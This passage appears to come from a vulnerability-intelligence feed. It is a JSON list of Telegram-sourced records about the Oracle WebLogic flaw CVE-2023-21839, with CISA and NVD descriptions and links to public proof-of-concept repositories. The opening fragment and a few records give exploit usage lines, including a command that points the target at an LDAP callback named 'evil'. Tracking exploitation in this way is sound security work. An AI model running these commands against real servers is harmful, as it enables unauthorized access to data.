CVE-2023-21839.exe\nCVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil", "creation_timestamp": "2023-03-03T11:00:15.000000Z"}, {"uuid": "82ac3180-2b33-4517-a8c4-f8a87e7b3758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/huwbgAbaMEWosXfyrmxxciyHWQADSO7pn6QM2fwvuRZxHT8", "content": "", "creation_timestamp": "2023-02-23T14:13:17.000000Z"}, {"uuid": "203504d1-250b-4500-ac02-b65267788a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/E2GnXuDb4RwZPSkCQd23ewMo-H7lFJl9luVffYlNtma6JKU", "content": "", "creation_timestamp": "2023-02-22T10:12:27.000000Z"}, {"uuid": "67128378-376d-4c34-beca-be47d1044c8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/rtIvSzND_cGJDjAmNbpFbRjMYLO0j4LkJOjAcfYVbCa7YVw", "content": "", "creation_timestamp": "2023-02-22T06:20:02.000000Z"}, {"uuid": "c1ef3b36-69df-4d54-bf31-5ee7b1d19ffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "Telegram/zv0-WN1ekGzYSPAJbDAdNFDyGxKQy119XVSjXkoYLwf1MgNb", "content": "", "creation_timestamp": "2024-06-06T19:08:56.000000Z"}, {"uuid": "7d3891d0-d205-4318-b711-3f2cb7f43955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/547", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-11-24T22:48:52.000000Z"}, {"uuid": "6ce53fc4-1618-4377-967a-1cf2d55cf3c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1819", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956770000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-16T12:36:22.000000Z"}, {"uuid": "bc7bcc06-8df6-4dfa-9d47-33300cf3d3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1120", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-04T05:09:32.000000Z"}, {"uuid": "22c3d342-024f-4d96-a33d-234af0961cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "Telegram/TWFAujDiM9Q_sDIuwdzuCj1B9CB6p4iXNPfDtcfRQau4qapO", "content": "", "creation_timestamp": "2024-06-13T14:24:39.000000Z"}, {"uuid": "3cb34bbe-896f-4aa3-b540-4cf6c8fd9414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1666", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-10T17:39:47.000000Z"}, {"uuid": "bdc250e3-2f03-431d-a25a-3a65d4ee5fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/Oxq5SO8-21GQipP6NIDCbdDkAA225btYdW6eEU8zypkEJg0", "content": "", "creation_timestamp": "2025-03-15T22:00:06.000000Z"}, {"uuid": "b1f46a38-244f-4695-98fb-6a2d64c78451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "Telegram/df00WYSUjit1DWXpvNXHqs49rHh6V5cBerM4bfCs3-Ie", "content": "", "creation_timestamp": "2024-06-13T22:47:27.000000Z"}, {"uuid": "d3c17322-d122-462e-90ff-9eae5215c852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2337", "content": "#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bCTI Fundamentals\n\nA collection of papers, blogs, and resources that make up the quintessential aspects of cyber threat intelligence.\n\nhttps://github.com/curated-intel/CTI-fundamentals\n\n\u200b\u200bprotocurl\n\nprotoCURL is cURL for Protobuf: The command-line tool for interacting with Protobuf over HTTP REST endpoints using human-readable text formats\n\nhttps://github.com/qaware/protocurl\n\n\u200b\u200bmast1c0re\n\nDevelop payloads that can be executed on the PlayStation 4 or PlayStation 5 through a game save file.\n\nhttps://github.com/McCaulay/mast1c0re\n\n\u200b\u200bSerianalyzer\n\nSerianalyzer is a static bytecode analyzer tracing native method calls made by methods called during deserialization.\n\nThe main purpose of this tool is as a research tool to audit code for dangerous behavior during deserialization. It is not really useful to determine whether you application is vulnerable or not. If your application deserializes data crossing trust boundaries - you should assume it is.\n\nhttps://github.com/mbechler/serianalyzer\n\n\u200b\u200bAwesome Vulnerable Applications\n\nA curated list of various vulnerable by design applications\n\nhttps://github.com/vavkamil/awesome-vulnerable-apps\n\n\u200b\u200bTheThing\n\nOpen-source tool to detect DOM Clobbering vulnerabilities.\n\nhttps://github.com/SoheilKhodayari/TheThing\n\nDOM Clobbering? \u2192 https://domclob.xyz/\n\n#cybersecurity #infosec\n\n\u200b\u200bMineMe\n\nMineMe is a node tool that gathers information about a Minecraft account by scraping multiple websites. It should be really easy to make your own modules, so don't hesitate to fork and bring your own things.\n\nhttps://github.com/Nenaff/MineMe\n\n#minecraft #OSINT\n\n\u200b\u200bWifi-Hacking\n\nCyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES)\n\nhttps://github.com/ankit0183/Wifi-Hacking\n\n\u200b\u200bVDP-Finder\n\nThis extension tells if visited sites have vulnerability disclosure programs\n\nhttps://github.com/yeswehack/yeswehack_vdp_finder\n\n\u200b\u200boss-vulnerability-guide\n\nA guide on coordinated vulnerability disclosure for open source projects. Includes templates for security policies (security.md) and disclosure notifications.\n\nhttps://github.com/ossf/oss-vulnerability-guide\n\n\u200b\u200bSentinelPS\n\nAzure Sentinel-related PowerShell scripts\n\nhttps://github.com/rod-trent/SentinelPS\n\n\u200b\u200bWeblogic CVE-2023-21839\n\nhttps://github.com/Scarehehe/Weblogic-CVE-2023-21839\n\n#cve #poc\n\n\u200b\u200bIntelMQ \n\nIntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.\n\nhttps://github.com/certtools/intelmq\n\nBTC:\nbc1q62lwma4r3w3klq4mcn5hys9nps5h40qmafrc8e\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\nwww.ghostclan.org", "creation_timestamp": "2024-02-08T19:39:36.000000Z"}, {"uuid": "5108f53e-3a95-41bd-9a7e-e7624cb074f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/vxR48xjEP6WBdCVXNbCTjoVsMUt2b0RWUkGzAhfJjXTHV4Q", "content": "", "creation_timestamp": "2025-03-21T16:00:10.000000Z"}, {"uuid": "e5df8710-ec83-4853-ab9a-33396f7619dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/ZlaxNukjypT5vOtDz8wMSCFTorbGWtJCsvTUlszpJkI7kUA", "content": "", "creation_timestamp": "2025-03-05T16:00:09.000000Z"}, {"uuid": "88f72761-927f-42d1-9e30-280ea99d022d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/zSzoebszbbIXMk27Rqts2RR5nycMptSURZnSEC0hbBVOUIQ", "content": "", "creation_timestamp": "2025-03-03T22:00:06.000000Z"}, {"uuid": "417407c6-719a-4e22-9910-a22dd07ac8f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/qOGRN02zxh7X-pALZbUajuSx7WC-BrFnsJBUinVh29xifwg", "content": "", "creation_timestamp": "2025-02-24T16:00:08.000000Z"}, {"uuid": "52cd36d9-b9aa-499e-9341-598e90020bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1396", "content": "Weblogic-CVE-2023-21839\n*\nAffected version\n12.2.1.3.0\n12.2.1.4.0\n14.1.1.0.0\n\nPOC\n\nUsage POC:\njava -jar target ip: \u0430\u0434\u0440\u0435\u0441 \u043f\u043e\u0440\u0442\u0430 ldap", "creation_timestamp": "2023-02-22T08:16:14.000000Z"}, {"uuid": "6619acd4-e84d-449d-b14b-2fb86953a674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/YE_0x/770", "content": "\u0623\u0636\u0627\u0641\u062a \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0623\u0645\u0646 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 (CISA) \u062b\u0644\u0627\u062b\u0629 \u0639\u064a\u0648\u0628 \u0625\u0644\u0649 \u0643\u062a\u0627\u0644\u0648\u062c \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u063a\u0644\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 (KEV) \u060c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u062f\u0644\u064a\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0646\u0634\u0637.\n\nCVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability\nCVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability\n\n\ud83d\udea8 ===============\n\ud83d\udd30 #0xYE\n\ud83d\udd30 #Cyber_Security\n\ud83d\udd30 #Yemeni_Hackers \n\ud83d\udd30 @YE_0x\n\ud83d\udea8===============", "creation_timestamp": "2023-07-06T16:19:06.000000Z"}, {"uuid": "e626fc89-3db0-4f70-9489-f2b81e70543d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/breachdetector/325905", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21839 Oracle WebLogic Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"29 Aug 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-08-29T10:43:00.000000Z"}, {"uuid": "fe408486-380e-44d7-bd67-2de97fc88d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/4133", "content": "\u041a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c 4ra1n \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b PoC\u00a0\u0434\u043b\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2023-21839, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Oracle WebLogic \u0438 \u0438\u043c\u0435\u044e\u0449\u0435\u0439 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 7,5.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 Oracle WebLogic Server \u0434\u043b\u044f Oracle Fusion Middleware \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u044f\u0434\u0440\u0430 \u0438 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u0438 12.2.1.3.0, 12.2.1.4.0 \u0438 14.1.1.0.0.\n\n\u041b\u0435\u0433\u043a\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 T3, IIOP, \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c Oracle WebLogic Server.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0443 \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u043b\u0438 \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0443 \u043a\u043e \u0432\u0441\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c Oracle WebLogic Server.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 Oracle 24 \u044f\u043d\u0432\u0430\u0440\u044f \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0437\u0430\u0431\u043e\u0442\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u043a\u0443\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0440\u0438\u0441\u043a\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2023-03-06T11:23:41.000000Z"}, {"uuid": "27da6a9d-2e81-4034-b042-e2f2197caa69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/-PMYKqFNcLaJdOUBsk5-oyra9fd6nCwZMBxV9rVe8rsei-E", "content": "", "creation_timestamp": "2024-03-22T15:42:38.000000Z"}, {"uuid": "28b1f678-ff79-4bf3-a8a8-ba4594a4e821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/ZWO6bVGmvRomAIGB1Gy9nQK9S9lVg_M5eyQCvJuH67nXwuk", "content": "", "creation_timestamp": "2023-04-14T05:35:06.000000Z"}, {"uuid": "1642e101-f85d-4082-9339-247380d2eef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/cFE2uDJKQiKElmO3_7KlSaQHLf9u2iA0iIuDt9gRXSoyrPs", "content": "", "creation_timestamp": "2023-03-14T04:09:39.000000Z"}, {"uuid": "4e1a6ba2-2cab-4778-8737-97714158c488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/information_security_channel/49839", "content": "CISA Warns of Attacks Exploiting Oracle WebLogic Vulnerability Patched in January\nhttps://www.securityweek.com/cisa-warns-of-attacks-exploiting-oracle-weblogic-vulnerability-patched-in-january/\n\nCISA warns of attacks exploiting an Oracle WebLogic vulnerability tracked as CVE-2023-21839, which was patched with the January 2023 CPU.\nThe post CISA Warns of Attacks Exploiting Oracle WebLogic Vulnerability Patched in January (https://www.securityweek.com/cisa-warns-of-attacks-exploiting-oracle-weblogic-vulnerability-patched-in-january/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2023-05-02T13:24:04.000000Z"}, {"uuid": "50380bd0-0c85-46a4-acb0-22b3c7ab4c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4713", "content": "Weblogic-CVE-2023-21839\n\n\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 :\n\n12.2.1.3.0\n\n12.2.1.4.0\n\n14.1.1.0.0\n\nGithub\n\nUsage : \n\njava -jar target ip: port ldap address\n\n#CVE \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:26:05.000000Z"}, {"uuid": "1662922a-c21b-4f05-9680-c94dd2676580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/thehackernews/3303", "content": "Heads up, everyone! \n \nCISA has issued an advisory warning of active exploitation of three known vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX-21), CVE-2021-45046 (Apache Log4j2) and CVE-2023-21839 (Oracle WebLogic). \n \nDetails: https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html", "creation_timestamp": "2023-05-02T07:47:51.000000Z"}, {"uuid": "69346d6c-5518-4df1-aea6-78485fa3ff8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2611", "content": "#CVE-2023\nPOC and Scanner for CVE-2023-24055\nhttps://github.com/deetl/CVE-2023-24055\n\n\nCVE-2023-21839 exp\n\nhttps://github.com/fakenews2025/CVE-2023-21839\n\nCVE-2023-23132\n\nhttps://github.com/l00neyhacker/CVE-2023-23132\n\n@BlueRedTeam", "creation_timestamp": "2023-03-05T09:27:29.000000Z"}, {"uuid": "b3a50510-435a-4a6f-9468-9c2a3746d73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/460", "content": "https://github.com/Scarehehe/Weblogic-CVE-2023-21839\n#github", "creation_timestamp": "2023-02-22T11:32:01.000000Z"}, {"uuid": "a8b8b437-4357-4800-834b-1b68c621d0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7807", "content": "#exploit\n1. CVE-2022-41042:\nHTML/JavaScript injection in MS SARIF viewer/MS Live Preview extension, Path traversal in the local HTTP server in MS Live Preview extension\nhttps://blog.trailofbits.com/2023/02/21/vscode-extension-escape-vulnerability\n\n2. CVE-2023-21839:\nVulnerability in the Oracle WebLogic Server\nhttps://github.com/Scarehehe/Weblogic-CVE-2023-21839", "creation_timestamp": "2023-02-23T11:23:01.000000Z"}, {"uuid": "bbc3fc63-0f67-40f0-a067-efad5903a04b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4765", "content": "Weblogic CVE-2023-21839 RCE\n\nGithub\n\n#CVE #RCE\n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:26:07.000000Z"}]}